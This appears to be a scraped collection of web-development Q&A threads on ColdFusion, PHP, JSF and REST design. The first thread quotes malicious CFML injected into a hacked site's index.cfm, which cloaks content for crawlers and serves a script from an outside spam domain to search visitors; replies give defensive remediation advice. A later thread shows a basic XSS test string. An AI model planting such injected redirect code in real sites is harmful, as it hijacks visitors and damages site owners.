Aargh! Coldfusion sites are being hacked - redirect

Some of our coldfusion sites are being redirected to a mulberry site when someone does a google search. Is there a way to prevent this? How are they doing it in the first place? It look like this code is being inserted into the index.cfm:
<cffunction name="isSpider" returntype="boolean">
<cfif reFindNoCase("(bot|crawl|spider|slurp|yahoo|sohu-search|lycos|robozil la)", cgi.http_user_agent)>
<cfreturn true />
<cfreturn false />
<cffunction name="isEngine" returntype="boolean">
<cfif reFindNoCase("(google|bing|aol|search|baidu|yahoo|sogou|soso|live|you dao|so)", cgi.http_referer)>
<cfreturn true />
<cfreturn false />
<cffunction name="isPage" returntype="boolean">
<cfif reFindNoCase("(index.|default.|main.)", cgi.script_name)>
<cfreturn true />
<cfreturn false />
<cfif isSpider() and isPage()>
<cfcontent reset="true" />
<cffile action="read" file="#expandPath("/images/log.gif")#" variable="tpl" />
<cfabort />
<cfif isEngine() and isPage()>
<cfcontent reset="true" />
<script src="http://www.shopsnapbackhatus.com/jie/mulberry.gif" type="text/javascript" charset="utf-8"></script>
<cfabort />

You've not mentioned which version of CF, nor whether IIS or apache etc (again which version) etc.
The attack could be coming through multiple vectors, and it's highly likely there's a backdoor of some description judging by the fact they're actively writing code to templates. Even if you find the entry point, it's not going to do any good unless you can say 'yes it was this' and patch it. Is your CF up to date?
Start Here: http://hackmycf.com/
Then look at your templates - I'm willing to bet there's some .cfm files in there which shouldn't be. have you got a backup? compare it (and go back months - a lot of intrusion attempts access early, leave it for a while, then start doing things).
Personally, I'd consider wiping and starting again to be absolutely sure, but even then, you need to check the code you redeploy is 100% safe, and that the environment is fully patched, and that you actually found the initial cause.

First of all
it may be due to google or other search engine instead check your code.
Apply current patches from ColdFusion.
Make sure you are using for all of your queries since SQL injection is most probably cause this.
And don't forget about XSS attack. If those sites taking user input which displaying publicly then first encode appropriately user input your site.
Check out ColdFusion lockdown guide (please choose as per your coldfusion version) http://www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf
All of the above perform vulnerability test for all your site (if you are managing it) using any commercial or open source tool (I like Zad Attack Proxy).
Before doing all of the above check your existing database for miscellaneous code (normally javascript tag) and correct it.


ColdFusion adding extensions to names of uploaded files?

So I was just working on some ColdFusion code to validate upload filename extensions, and I've noticed that when I delete the extension from a filename and then upload the file, the extension gets added back somehow I'm guessing based on the MIME type, however I'm not sure if ColdFusion is doing this, or the browser (MS Edge on Mac)? The extension appears inside the CLIENTFILE, CLIENTFILEEXT, CONTENTSUBTYPE, as well as the ATTEMPTEDSERVERFILE, SERVERFILE, and SERVERFILEEXT properties of the <cffile> result, even though the filename of the uploaded file didn't have an extension.
Anyone know what's going on?
This is the form input <input type="file" name="attachment1" style="width:100%"> and this is how it's being saved <cffile action="upload" filefield="attachment1" destination="#request.email_upload_folder#" nameconflict="overwrite" result="my_result1">. The extension also shows up when I use this function to get the client file name (I admit to copy-pasting this code without understanding how it works):
<cffunction name="getClientFileName" access="public" returntype="string" output="false" hint="">
<cfargument name="fieldName" required="true" type="string" hint="Name of the Form field" />
<cfset var tmpPartsArray = Form.getPartsArray() />
<cfif IsDefined("tmpPartsArray")>
<cfloop array="#tmpPartsArray#" index="local.tmpPart">
<cfif local.tmpPart.isFile() AND local.tmpPart.getName() EQ arguments.fieldName>
<cfreturn local.tmpPart.getFileName() />
<cfreturn "" />

testing for html/script injection and getting kicked from a server

In researching an idea I came across a good YouTube video on security (with nodejs) which covered a lot more than the usual SQL injection. One such was simple script and html injection through html encoding. javascript buffers etc.
In researching this for a project I'm working on I came across this script from the php.net documentation website:
if ($_POST) {
echo '<pre>';
echo htmlspecialchars(print_r($_POST, true));
echo '</pre>';
<form action="" method="post">
Name: <input type="text" name="personal[name]" /><br />
Email: <input type="text" name="personal[email]" /><br />
Beer: <br />
<select multiple name="beer[]">
<option value="warthog">Warthog</option>
<option value="guinness">Guinness</option>
<option value="stuttgarter">Stuttgarter Schwabenbräu</option>
</select><br />
<input type="submit" value="submit me!" />
Looking at the code, I believed the html injection was safe and as I didn't have somewhere to test this script out, I just uploaded it to a hosting domain I have and played with it remotely. When I tried a basic alert injection:
I got an error from the server (a 403 Forbidden). I thought I malformed the html so I tried some minor variations and before I knew it I was banned from my server :D (I was able to reset it, that's not the concern).
Tonight I deployed a VM with apache and php and started playing with it, and when I used the same code, I actually saw what I'd originally expected to see. The array output is presented as expected because of the htmlspecialchars.
[personal] => Array
[name] => <b>bold</bold>
[email] => <script>alert("test");</script>
[beer] => Array
[0] => stuttgarter
What I'd like to know is:
1. Does the browser do some manipulation that nullifies the script tags since there's nothing in the form that does that? My guess is that nothing is an issue until it's attempted to be parsed by the page on form submission. Correct?
2. When I ran it locally the output was as expected (ie, no alert box and correct parsing) which infers that the values are somewhat "safe" until php attempts to parse them via the print_r. If I remove the htmlspecialchars the page fails to load ERR_BLOCKED_BY_XSS_AUDITOR (so that's good). If the original page never parses the raw code, why would the remote server ban my IP if it's correctly escaped within the output code? Again, I'm guessing, but would it be the host is just preemptively trying to prevent attacks and processing all $_POST vars for XSS?

JSF form not processed correctly

I'm blocked for couple of days on a JSF issue.
I have a web app where I create the page content quite dynamically from database data. Every page has several sections containing a form with h:commandButton (or a set of buttons).
Some forms work correctly and the form action method is launched as expected. Some other forms however don't work - the action method is not being called at all.
And I don't know why :-(
I know this response: action method is not called in JSF which lists conditions which must be fulfilled and I believe that everything is ok here, but it simply doesn't work for some forms...
Some points:
The problem is 100% repeatable
The same piece of XHTML is used for both successful and unsuccessful requests
The same action method (in the same bean) is being called for all forms
the console output differs in both cases
...RESTORE_VIEW phase is the same (my code logs seem to be equal)
...APPLY_REQUEST and few other phases are empty for the wrong case (only the final RENDER_RESPONSE phase is being executed
...APPLY_REQUEST and the following phases are not empty for the correct phase
(using ui:debug) Scoped variables / Request parameters contain ONLY vallues passed via f:param for the successfull case
Scoped variables / Request parameters contain however also formid, formid:action_name and an input box content for the UNsuccessfull case
the console shows absolutely no exception in any case
the correct request returns HTTP code 302 followed by another GET request with the target parameters (as build in the action method)
the incorrect request returns directly 200 (and no action is called)
when the JSF debug is switched on (javax.faces.level = ALL, com.sun.faces.level = ALL) still no exception is being shown, I see only couple of "javax.faces.component.UIComponentBase getRenderer\nFINE: No renderer-type for component j_idt171" messages and one "com.sun.faces.facelets.util.DevTools writeAttributes
FINEST: Error writing out attribute" followed by a NullPointerException - during RENDER_RESPONSE phase
So most probably there is a problem with restoring the view, but I have no idea why. The same XHTML block generates form and command button for both (successfull and unsuccessfull) cases (in a c:forEach loop).
But the strange think is also difference in the parameters in the correct case an in the wrong case...
Can anyone plase give me some directions what/where I should be looking for?
Thanks a lot in advance!
EDIT: some code...
This is the XHTML (unnecessary code cis cut)
<ui:composition xmlns="http://www.w3.org/1999/xhtml"
<ui:define name="title">IS runtime</ui:define>
<ui:define name="menu">
<h:link value="Home" outcome="/index" /> | <h:link value="IS home"
<f:param name="env" value="#{param.env}" />
<ui:define name="content">
<c:forEach var="pv" items="#{runtimeBean.pageViews}">
<div id="view_#{runtimeBean.ISViews[pv.view].code}"
<h:form id="form_#{runtimeBean.ISViews[pv.view].code}">
<h:messages />
test="#{runtimeBean.getEnvView(pv.view).type == 'RECORD_DETAIL'}">
<c:forEach var="item" items="#{runtimeBean.getViewItems(pv.view)}">
<h:outputText value="#{item.sqlColumn}" />:
<ui:fragment rendered="#{item.type == 'INPUT_FIELD'}">
<h:inputText id="#{item.sqlColumn}"
value="#{runtimeBean.sqlData0[item.sqlColumn]}" />
<ui:fragment rendered="#{item.type == 'READ_ONLY'}">
<h:outputText value="#{runtimeBean.sqlData0[item.sqlColumn]}" />
<br />
<c:forEach var="action"
items="#{runtimeBean.getViewActions(pv.view, 'BOTTOM_LEFT')}">
<h:commandButton id="action_BL_#{action.code}"
value="#{action.code}" action="#{runtimeBean.doPageAction}">
<f:param name="env" value="#{param.env}" />
<f:param name="view" value="#{pv.view}" />
<f:param name="action" value="#{action.id}" />
<c:forEach var="actionParam"
<f:param name="#{actionParam}" value="#{param[actionParam]}" />
<ui:debug hotkey="z"
rendered="#{facesContext.application.projectStage == 'Development'}" />
This is Scoped Variables / Request Parameters for the correctly processed action:
Name Value
env 5
id 22
page 3
After the correct action the next page contains the parameters as passed:
and the same for the incorrect action:
Name Value
action 3
env 5
form_prj_detail form_prj_detail
form_prj_detail:action_BL_delete form_prj_detail:action_BL_delete
form_prj_detail:name p5
id 22
view 3
In the wrong case the next page doesn't show the arguments. Just simple:
In both cases the parameters are passed already in the HTTP (POST) request. It seems to me more as a problem of javascript part of the JSF library...
I made some progress in investigating the problem and I've found the following:
The page is being generated dynamically including the forms. They are generated based on parameters passed to the page.
However when applying the form data, they are being applied to page built with missing parameter. If the particular form is NOT present on the same page rendered w/o this parameter, the JSF then doesn't know the form instance and thus its values are not applied and the rest of the page processing chain is invalid.
Using different words: if I add the problematic form to a "default page" (with missing page parameter), the form is processed also from different pages (the same XHTML but different parametrs causing showing different forms on the page).
So for some reason when the page is restored or when the form data are being applied not all page parameters are used to restore the view.
...I made one small step but still don't have a solution and I'm frustrated :-(((
So, finally I've understood the problem.
The problem is in the Restore View phase when the server reconstructs the submitted page before any form values could be set and before the form action could be performed.
The point is that the page is not being restored from internal JSF view state but it's restored as a "new" page - and using arguments used to build the original page.
My app. creates the forms dynamically and concrete page content depends on the page parameters (set in the HTTP GET message) and then data read from DB. Pressing a command button builds a request with parameters necessary for making the action - which however don't match with parameters necessary to reconstruct the original/previous page (I don't care of it).
This means that the Restore view is reconstructing DIFFERENT page than the one the command button is pressed from. This means that the reconstructed forms don't match with the original page forms. And this finally means that they can't be matched and thus the follow up life cycle steps are not successfull and no action method could be called.
So... this is either my misunderstanding of the JSF principles OR it's a JSF design issue.
I'd simply expect that the Restore View must be performed implicitly and automatically...
Comments welcome!

How long does CFmail take to send?

I am making an app that creates a custom PDF, mails it and then deletes it. I have tested all 3 components separately and they work but when I put them together the email doesn't send.
Is it possible that the attachment gets deleted before the email is sent even though the delete is after it in the script?
Here is my code.
<!---Get the PDF--->
PDFBuilder = createobject("component", "form_admin.email.PDFBuilder" );
pdf = PDFBuilder.createPDF(form_id);
<!---Create link to the pdf --->
foo = expandPath('../email/tmp/') & pdf & '.pdf';
<!---Create email--->
<cfmail to="will#hazardousfrog.com"
subject="Jag intrest form. "
type="text/html" >
<cfmailparam file="#foo#">
Dear #getEmail.title#, #getEmail.first_name# #getEmail.surname# <br />
Attached is a PDF boucher telling you more information about the cars you were interested in. <br />
Best wishes <br />
Jaguar <br /><br /><br /><br /><br /><br /><br /><br />
This is not actually jaguar this is a test application by Hazardousfrog.
<!---Delete the file after it has been sent --->
<cfif FileExists(#foo#)>
<cffile action="delete"
<cfoutput >
Sorry if the code isn't great I have only been doing CF for like 2 weeks.
Ok I managed to get the answer from a work friend.
When cfmail is processed the mail is saved into a spool and periodically sent out after about 3 mins.
In my case it meant that the email PDF attachment was being deleted before the message could be sent so the mail was not sending.
The coldFusion mail tag has an attribute to send it straight away or keep it spooled.
spoolenable : Whether to spool mail or always send it Immediately.
So to get it to get my code to work I added this line to my mail attributes.
One other option would be to use the remove attribute of the cfmailparam tag which will tell CF to remove the file after it is sent. This way your spoolenable attribute can be true and it should work as desired. The remove attribute was introduced in version 8.0.1.
I would also place a fileExists() around the cfmail code on whether the pdf file indeed has been created.

Adding items to a resource restfully using OpenRasta

I'm using OpenRasta to create a Survey application.
I have a SurveyResource that is accessible at /surveys/{id} and editable at /surveys/{id}/edit
I'd now like to add questions to the survey, as that is the point of a survey, but I'm not sure what the most restful way of doing this is and how to set it up in OR.
I'm thinking I should have a QuestionResource (that has details of the question type, question text, etc) and it should be posted to /surveys/{id}/questions and handled by a question handler, but I can't work out how to configure OR.
I've pushed my project onto github at https://github.com/oharab/OpenSurvey/tree/add_question_to_survey
Can anyone help me?
it depends on the way you want to model your resources. It's perfectly possible that you'd never explicitly provide access to a single question, and would modify the entire survey document, like so:
PUT /surveys/123
<link rel="update" href="/surveys/123" method="PUT"
type="application/vnd.mycorp.survey+xml" />
<question id="age">
<label>How old are you?</label>
<option>0 - 5</option>
<option>6 - 10</option>
<option>10 - 13</option>
If you go this route, you could even use HTML, or HTML 5 for your content so it's easy to consume by clients. Now you're just modifying the entire survey document at once.
Alternatively, you might want to separately address each question, giving them an individual URI, which I think is what you're talking about, like so:
GET /survey/123
<link rel="add-question" href="/survey/123/questions"
type="application/vnd.mycorp.surveyquestion+xml" method="POST" />
<link rel="delete" href="/questions/123-age" method="DELETE" />
<link rel="update" href="/questions/123-age" type="application/vnd.mycorp.surveyquestion+xml" method="PUT" />
<label>How old are you?</label>
<option>0 - 5</option>
<option>6 - 10</option>
<option>10 - 13</option>
Neither of these is more RESTful than the other, the difference is only in granularity of call. If you need the granularity of the latter, then configure yourself a separate handler per resource as in